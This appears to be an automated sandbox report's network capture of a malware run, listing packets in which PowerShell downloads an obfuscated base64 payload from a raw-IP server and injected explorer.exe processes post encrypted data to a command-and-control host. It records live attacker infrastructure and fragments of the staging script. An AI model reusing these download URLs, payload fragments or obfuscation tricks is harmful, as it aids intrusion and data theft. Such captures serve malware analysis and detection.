Nov 18, 2024 18:37:18.759097099 CET	1236	IN	Data Raw: 00 59 00 57 00 35 00 6b 00 51 00 6e 00 6c 00 30 00 5a 00 58 00 4d 00 70 00 4f 00 33 00 4e 00 6c 00 57 00 58 00 5a 00 68 00 61 00 55 00 31 00 6c 00 64 00 47 00 68 00 76 00 5a 00 43 00 41 00 39 00 49 00 46 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52 Data Ascii: YW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFKXNVFCRPJSLUQMDsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2
Nov 18, 2024 18:37:18.759109974 CET	1236	IN	Data Raw: 00 47 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52 00 50 00 4a 00 53 00 4c 00 55 00 51 00 4d 00 44 00 39 00 51 00 64 00 55 00 6b 00 73 00 55 00 48 00 56 00 4a 00 5a 00 47 00 56 00 7a 00 59 00 58 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52 00 50 00 4a Data Ascii: GKXNVFCRPJSLUQMD9QdUksUHVJZGVzYXKXNVFCRPJSLUQMDRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycp
Nov 18, 2024 18:37:18.759120941 CET	1236	IN	Data Raw: 00 52 00 50 00 4a 00 53 00 4c 00 55 00 51 00 4d 00 44 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 6a 00 75 00 67 00 61 00 72 00 20 00 3d 00 20 00 65 00 6e 00 6a 00 75 00 67 00 61 00 72 00 20 00 26 00 20 00 22 Data Ascii: RPJSLUQMD" enjugar = enjugar & "KXNVFCRPJSLUQMD" & engordamento & "'KXNVFCRPJSLUQMD" enjugar = enjugar
Nov 18, 2024 18:37:18.759394884 CET	1236	IN	Data Raw: 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 6a 00 75 00 67 00 61 00 72 00 20 00 3d 00 20 00 65 00 6e 00 6a 00 75 00 67 00 61 00 72 00 20 00 26 00 20 00 22 00 64 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52 00 50 00 4a 00 53 Data Ascii: enjugar = enjugar & "dKXNVFCRPJSLUQMDinKXNVFCRPJSLUQMD" enjugar = enjugar & "gKXNVFCRPJSLUQMD]:"
Nov 18, 2024 18:37:18.763900042 CET	1236	IN	Data Raw: 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 6a 00 75 00 67 00 61 00 72 00 20 00 3d 00 20 00 65 00 6e 00 6a 00 75 00 67 00 61 00 72 00 20 00 26 00 20 00 22 00 6d 00 62 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52 Data Ascii: " enjugar = enjugar & "mbKXNVFCRPJSLUQMDas" enjugar = enjugar & "eKXNVFCRPJSLUQMD6" enjugar =

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	107.172.44.178	80	5568	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:37:42.140311956 CET	78	OUT	GET /53/WRFFRGT.txt HTTP/1.1 Host: 107.172.44.178 Connection: Keep-Alive
Nov 18, 2024 18:37:42.823004007 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:37:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 18 Nov 2024 01:44:05 GMT ETag: "c558-627260d4938d1" Accept-Ranges: bytes Content-Length: 50520 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 18, 2024 18:37:42.823098898 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 18, 2024 18:37:42.823112011 CET	424	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 18, 2024 18:37:42.823468924 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 18, 2024 18:37:42.823482990 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 18, 2024 18:37:42.823494911 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 18, 2024 18:37:42.824312925 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 18, 2024 18:37:42.824326992 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 18, 2024 18:37:42.824338913 CET	1060	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 18, 2024 18:37:42.825136900 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwGdjWmrttLZ0zd70IE91TXkF6ejvOI+M2Yb03Y6t1ejOAAtMT71bR
Nov 18, 2024 18:37:42.829281092 CET	1236	IN	Data Raw: 72 4c 43 68 63 64 35 6f 55 61 56 47 54 55 52 36 54 55 42 46 68 4c 52 48 58 6b 6c 55 68 65 34 58 61 30 39 46 41 74 32 47 57 51 34 48 68 4a 64 55 5a 63 51 78 5a 39 41 49 4e 68 31 35 67 55 32 57 76 50 53 62 61 2f 58 35 6c 2f 55 54 6c 4d 51 55 44 64 Data Ascii: rLChcd5oUaVGTUR6TUBFhLRHXklUhe4Xa09FAt2GWQ4HhJdUZcQxZ9AINh15gU2WvPSba/X5l/UTlMQUDdS4fNmJp71apEREXdLGUtOKIUSH8oRGUoWENbR+QUUFRORbUkpElNZBQeW6lwN3U8OFTcBH3j4qhEJEX9fEjpQcpYrBZWRZS2DWXRBLtplAdKBQRKyHf1xDV20ALw1EVQTrb5AJRslUhkG3b8JEUtOIEUWF40OYfT1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49781	46.173.214.24	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:38:07.977413893 CET	279	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://siwffuchsxpuu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 210 Host: prolinice.ga
Nov 18, 2024 18:38:07.977498055 CET	210	OUT	Data Raw: 6e e2 99 f7 cc 38 88 61 6a 16 b1 1a 4f 2a fa 85 da 24 e8 54 32 8b be 9a 83 eb 79 65 dd 3a 46 08 40 b8 99 b1 0f d8 85 a6 15 c8 c4 fa 9a a0 20 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 1f b7 e0 91 Data Ascii: n8ajO*$T2ye:F@ &7H8.6hEv:RY;PLgc`(Q5V[\yU75VV"tbw;evND~ewAtRom6OhVvRn&D+QS
Nov 18, 2024 18:38:09.197149992 CET	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 18 Nov 2024 17:38:08 GMT Server: Apache/2.4.59 (Debian) Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Data Raw: 35 32 64 35 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a [TRUNCATED] Data Ascii: 52d53_'!yS5&M%DJ;Gw,%)g{RFzT~r~DkAcJnKBe(;Q`x:2Gx{EJy/ym!Q]K,\|WS}"w2bqv?OURB2hvt)U>P$\;QIzzdyW&Fv"-CL=pK@Bp^kQfsjDk$+KPPN2\WlT#6zbRKZ :D?UkKc'O?i@i3E\| [}S2TqL L7@x!FEx{4@h;pg_Q@[N2H%s;"r21LVRvo9bN\|P,ds,^L+j m.&>g!=/r:l_U*kH >(OAO\|q;@+o%Snnq nU[f&C5GT] T]>g{v[ySzB8IX<\r}23:=;HX>H+exij=Ou`'p3\|JY=R^Xo[#kn^T-la@9>$z\|kXv6]O8Rp\|otzAY2u-jk75HwbEIrBG`yDvWR0md9n/oc$7;KC?iT6cTD/m#R\|~Yr [TRUNCATED]
Nov 18, 2024 18:38:09.197285891 CET	212	IN	Data Raw: 50 60 c1 62 4e 47 09 99 34 01 6f 12 1a 46 5a dc 19 8a 32 8e 3a 4a 46 78 d9 bd c0 47 06 63 a2 e7 43 6c 5f a3 5c e6 3f 2b e2 a7 6d 88 36 d1 ab 7a 33 cd e9 51 55 b8 03 fb 2e 0d 79 6a 86 6c 78 60 5a 8e 07 2c 38 79 4f 36 32 6e 72 7e f0 72 29 40 6c 3b Data Ascii: P`bNG4oFZ2:JFxGcCl_\?+m6z3QU.yjlx`Z,8yO62nr~r)@l;i2,!a'MyPXN_k0aW,xqWbsevmBH,c:l%TM007#1<?y
Nov 18, 2024 18:38:09.197300911 CET	1236	IN	Data Raw: 99 65 d5 2d f5 67 a5 df 07 1c 74 f5 67 bd 63 db 08 77 af d3 8c 6d 56 60 26 f6 24 45 a8 5e 97 11 75 41 b4 77 49 98 30 71 b8 06 83 3a dd 3c bd f3 ae 0b 02 a2 80 23 7f 02 79 66 c6 fa 48 ee 4a d1 79 d0 3c 96 bd 13 34 1f 1d 11 5e 2f 7c 94 67 02 e3 78 Data Ascii: e-gtgcwmV`&$E^uAwI0q:<#yfHJy<4^/\|gxgaD{t`viG"J+`RsqN:#(]5%f__`BxTCB/Z\|-t[DDgd/pXLid*C!@qv^=:g{
Nov 18, 2024 18:38:09.197504997 CET	212	IN	Data Raw: b0 08 1a b5 21 fe 8d 1b a2 44 ad 36 e0 77 5c 98 a2 fe 1c 8d ed 29 14 9b f8 aa 38 f5 1e c1 35 2f 97 51 4e 7c 84 77 95 ee de c1 ce 9f 6e 32 2b 10 77 b2 d9 30 2f 02 81 e1 38 a6 a6 13 f3 02 84 36 53 75 ea a1 a0 c1 cc 39 0a f5 bc 99 22 4d 2e 18 6b bc Data Ascii: !D6w\)85/QN\|wn2+w0/86Su9"M.k$qW[PNkW,RPj+\mT~/^\U&gB,5<z#{4s/X/5e?s$lQ7]FsF[7)
Nov 18, 2024 18:38:09.197519064 CET	1236	IN	Data Raw: af 3a 6c 97 46 70 b8 0c e8 e6 3f e1 85 14 d7 e0 2e 25 a9 38 2a 73 2c 74 cf a0 e1 8a 21 e5 cc 74 4e a8 32 b8 f3 59 06 7e c8 97 a2 52 d1 3b f3 01 8c 76 b3 d5 7b 5b f2 3f d4 ca a3 fe 45 99 65 a9 46 0c c8 d1 f7 1f e4 54 f5 10 fc ce 88 74 e7 42 5f 91 Data Ascii: :lFp?.%8s,t!tN2Y~R;v{[?EeFTtB_eJ1\|Okr3f5v_L-pSmaB D.N]SV1\|)MVk=EpVqn*ozEAUoD(m]WE@?~xQ1HGw2
Nov 18, 2024 18:38:09.197536945 CET	1236	IN	Data Raw: 81 dd 5d f8 89 4b 96 e0 e1 2a 14 5f e6 f9 6b 02 6b 4f 6c 79 31 a9 d3 e0 54 70 ab 60 e7 0d 7c 5f 54 d7 a3 e5 a5 49 27 b0 e8 2c d8 7b 8c f1 e6 bc ae 1e d8 22 74 a4 f8 44 c1 8b f3 0f 22 96 47 1e 06 a7 4c 6d 0f 32 42 4e 51 d6 4d 0c e0 89 5b 50 5b 9c Data Ascii: ]K_kkOly1Tp`\|_TI',{"tD"GLm2BNQM[P[5z}=i6:w^\n?N,-O~x:w8@Y=p7P0l;PR@(p-3*}n`C3:I?wvIJQ#{3y
Nov 18, 2024 18:38:09.197912931 CET	424	IN	Data Raw: dc 61 25 60 a3 07 77 91 d8 25 0e 42 16 8f 82 ec 45 59 18 4d 6d cf 51 35 8d 50 49 d2 86 51 a3 23 18 c3 ce 6e d4 51 6f c1 f2 ea c0 24 49 28 d1 7e 6d 65 d1 16 3f a6 a1 41 49 0b cb 6f 5f 57 ef 48 bd ba 25 75 0e 0f 6d 6b 27 82 15 7a 05 46 4b 48 a8 59 Data Ascii: a%`w%BEYMmQ5PIQ#nQo$I(~me?AIo_WH%umk'zFKHYIvCt/i9*M=yS>f(`~q,m/~(mApme\(sD7!yg$vSm5z17;`JJ{
Nov 18, 2024 18:38:09.197995901 CET	1236	IN	Data Raw: 90 6f d5 86 12 6d fc 53 13 a8 c1 0a 8a af 89 df 66 25 35 10 34 1c 6d 7b 67 78 d5 80 d4 cd a3 f4 c9 4b 09 b2 8f c5 69 b3 e3 2e 68 db 5f 54 ac f4 4b ea f4 95 cf a6 e0 97 64 46 fa b2 4c 4e 19 30 04 78 43 d3 ff 6c 6e 19 40 99 27 48 d4 f5 71 c8 8c eb Data Ascii: omSf%54m{gxKi.h_TKdFLN0xCln@'Hq^o)h/dP,k}4K:VmBJ:Im;#OON {QK>:JmD9Jwx23gk>7)$YqPVpECH$H;\l=gK3c{R\Qo
Nov 18, 2024 18:38:09.198194027 CET	212	IN	Data Raw: 81 1a 91 ad a0 f5 38 b8 7c 5b 42 82 cf 5c f8 f3 8a 04 61 3a 4d dd dd 2d 80 40 2b 22 ee 6b 6f 17 fa dd b9 cf 0d 84 3f d4 e3 ff 65 86 bb 51 5d 2a 36 81 2d d3 fc 54 91 22 56 f9 f4 d4 62 b0 18 c9 6c 00 f4 c6 78 56 7e 7b 79 2f 4f e9 2f a8 24 40 4b f4 Data Ascii: 8\|[B\a:M-@+"ko?eQ]*6-T"VblxV~{y/O/$@K+3i{5js&EfUF=vDN%n2 RC8GYNe?hj$T"sScdZl"[f
Nov 18, 2024 18:38:09.198208094 CET	1236	IN	Data Raw: 8f de 66 96 dc f2 c7 16 30 02 45 55 5a 28 71 df 03 a9 d5 a3 6e 6d 54 81 f9 01 96 b0 09 28 a6 03 2e d0 c3 6d 13 d9 81 41 46 15 0b ba f9 b3 7e 65 76 92 5d cc 1e ae a9 35 b4 41 50 5c 10 7a 7f 88 38 1a ab bb 21 b9 69 ca 04 6b ff b9 a2 96 71 4a eb 5b Data Ascii: f0EUZ(qnmT(.mAF~ev]5AP\z8!ikqJ[V,T[?>Jy;t!Oj}Hxq:?Ig(TW--^rL-m\HTXd.elx 9b71SmX~io"r~L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49817	46.173.214.24	80	4928	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:38:15.780714035 CET	275	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://prolinice.ga/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 4431 Host: prolinice.ga
Nov 18, 2024 18:38:15.780919075 CET	4431	OUT	Data Raw: 6e e2 99 f7 cc 38 88 61 6a 16 b1 1a 4f 2a fa 85 da 24 e8 54 32 8b be 9a 83 eb 79 65 dd 3a 46 08 40 b8 99 b1 0f d8 85 a6 15 c8 c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 70 a4 c2 a2 Data Ascii: n8ajO$T2ye:F@eug]H8.6hEvRY;PLpOc~k_!z1rJC\S7W/x>x :xGresnq~jE%oux^2~mt-GD#SO`tAEiy}`8
Nov 18, 2024 18:38:17.020526886 CET	584	IN	HTTP/1.1 404 Not Found Date: Mon, 18 Nov 2024 17:38:16 GMT Server: Apache/2.4.59 (Debian) Content-Length: 409 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	142.215.209.78	443	5568	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
